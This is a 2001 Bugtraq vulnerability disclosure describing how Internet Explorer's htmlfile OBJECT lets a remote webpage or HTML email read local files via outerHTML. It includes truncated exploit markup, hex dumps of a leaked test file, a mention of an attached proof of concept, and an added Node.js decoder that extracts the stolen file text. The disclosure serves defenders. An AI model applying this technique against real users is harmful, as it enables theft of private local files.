Bugtraq mailing list archives

Internet Explorer allows reading of local files by remote webpages
From: Markus Kern <markus-kern () gmx net>
Date: Sun, 25 Nov 2001 11:52:04 +0100


There is a vulnerability in MS Internet Explorer that allows
any webpage or HTML email to read arbitrary local files.
This bug may also lead to remote command execution.

Vulnerable versions

All versions of IE seem to be affected. The following
configurations have been tested and are vulnerable:

Windows 2000 pro, IE 5.50
Windows 2000 pro SP2, IE 6.0, fully patched
Windows XP pro, IE 6.0


Workaround

Disable ActiveX in Internet Explorer.

Exploit details

The exploit is based on a very vague advisory posted to
vuln-dev () securityfocus com by NOMEN NESCIO SECURITY ALERT
<hush.little.baby () hushmail com> on 21/11/2001:

Marc Fossi <mfossi () securityfocus com> suggests that this may be
another way to exploit an old vulnerability discovered by
Georgi Guninski: http://www.securityfocus.com/bid/1718

First we create either a "htmlfile_FullWindowEmbed" or a
"htmlfile" object (both work):

<OBJECT ID="myObject"

Ok, alert(myObject.outerHTML); gives us the following:

<OBJECT id=myObject
OzwvcD4= ></OBJECT>

Decoding the Base64 string we get (hex dump):

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

The first 16 bytes are a GUID in the byte order Windows uses for a
CLSID in memory (Data1 little-endian, Data2 and Data3 little-endian,
Data4 as-is); read that way they are
{25336920-03F9-11CF-8FD0-00AA00686F13}, the CLSID of the htmlfile
class. The rest looks like HTML.
We inject the string
into the object using

<OBJECT ID="myObject"

(There are probably easier ways to do this but I'm not very familiar
with IE coding).

Now to the interesting part. After c:\test.txt is loaded we can
still access the data parameter of the object using myObject.outerHTML.
This time it contains the Base64-encoded contents of c:\test.txt among
other things.

So doing an alert(myObject.outerHTML); after the local file is loaded
we get:

<OBJECT id=myObject

with the Base64 string decoding to:

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
4554412068747470 2D65717569763D43  ETA.http-equiv=C
6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
656E743D22746578 742F68746D6C3B20  ent="text/html;.
636861727365743D 77696E646F77732D  charset=windows-
31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
593E3C2F48544D4C 3E0D0A            Y></HTML>..    

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary cross-domain DOM circumvention: the
remote page gets, through outerHTML, the DOM of a document IE has
loaded from the local file system, with all the usual implications.
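As an added example, not code from the advisory or its author, here is a
small Node.js decoder for the stream IE exposes through outerHTML. It
assumes the layout the two hex dumps show (a 16-byte CLSID in Windows
in-memory byte order, then the document HTML); both sample inputs are
constructed from those dumps, and the expected CLSID value
{25336920-03F9-11CF-8FD0-00AA00686F13} is the htmlfile class. It also
pulls the file text back out of the <XMP> wrapper IE puts around a plain
text file, which is the step the proof of concept performs.

```javascript
// Added example (not from the advisory): decode the Base64 stream that IE
// places in the OBJECT's data parameter, as seen in both hex dumps above.
// Layout assumed from the dumps: a 16-byte GUID in the in-memory order
// Windows uses for a CLSID (Data1 as little-endian u32, Data2 and Data3 as
// little-endian u16, Data4 as 8 raw bytes), followed by the HTML payload.
// Runs under Node.js; no browser is involved.

// CLSID of MSHTML's htmlfile class, which is what the first 16 bytes decode to.
const HTMLFILE_CLSID = "{25336920-03F9-11CF-8FD0-00AA00686F13}";

function hexUpper(buf) {
  return buf.toString("hex").toUpperCase();
}

// Render a 16-byte in-memory GUID in registry form {8-4-4-4-12}.
function formatClsid(bytes) {
  if (bytes.length !== 16) throw new Error("a GUID is exactly 16 bytes");
  const d1 = bytes.readUInt32LE(0).toString(16).padStart(8, "0");
  const d2 = bytes.readUInt16LE(4).toString(16).padStart(4, "0");
  const d3 = bytes.readUInt16LE(6).toString(16).padStart(4, "0");
  const d4 = hexUpper(bytes.subarray(8, 10));
  const d5 = hexUpper(bytes.subarray(10, 16));
  return `{${d1}-${d2}-${d3}-${d4}-${d5}}`.toUpperCase();
}

// Split the decoded data stream into its CLSID and the HTML that follows it.
function decodeObjectData(b64) {
  const raw = Buffer.from(b64, "base64");
  if (raw.length < 16) throw new Error("stream too short to hold a CLSID");
  return {
    clsid: formatClsid(raw.subarray(0, 16)),
    // windows-1252 payload; latin1 is byte-preserving for the ASCII seen here
    payload: raw.subarray(16).toString("latin1"),
  };
}

// IE wraps a plain-text file it loads in <XMP>...</XMP>; pull that back out.
// Returns null when the payload is not a wrapped text file.
function extractFileText(payload) {
  const m = /<XMP>([\s\S]*?)<\/XMP>/i.exec(payload);
  return m ? m[1] : null;
}

// Constructed sample 1: the bytes of the first hex dump in the post
// (empty htmlfile object), re-encoded the way IE would emit them.
const SAMPLE_EMPTY = Buffer.from(
  "20693325F903CF118FD000AA00686F13" + "3C703E266E6273703B3C2F703E",
  "hex"
).toString("base64");

// Constructed sample 2: the same CLSID followed by the document transcribed
// from the second hex dump, i.e. c:\test.txt ("hello world") after IE has
// rendered it as text inside <XMP>.
const SAMPLE_FILE = Buffer.concat([
  Buffer.from("20693325F903CF118FD000AA00686F13", "hex"),
  Buffer.from(
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n' +
      "<HTML><HEAD>\r\n" +
      '<META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>\r\n' +
      "<BODY><XMP>hello world</XMP></BODY></HTML>\r\n",
    "latin1"
  ),
]).toString("base64");

// Walk a sample the way the exploit would walk myObject.outerHTML.
function analyse(b64) {
  const { clsid, payload } = decodeObjectData(b64);
  return {
    clsid,
    isHtmlfile: clsid === HTMLFILE_CLSID,
    payload,
    fileText: extractFileText(payload),
  };
}

for (const [name, b64] of [["empty object", SAMPLE_EMPTY], ["after load", SAMPLE_FILE]]) {
  const r = analyse(b64);
  console.log(`${name}: clsid=${r.clsid} htmlfile=${r.isHtmlfile} file=${JSON.stringify(r.fileText)}`);
}
```

The first sample re-encodes to a Base64 string ending in "OzwvcD4=", the
tail visible in the post's own outerHTML output, which is a cheap check
that the assumed layout matches what IE emitted.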

Proof of concept exploit

I have attached a zipped HTML file that reads c:\test.txt and
displays it.

Markus Kern

Attachment: htmlfile_FWE-exploit.zip
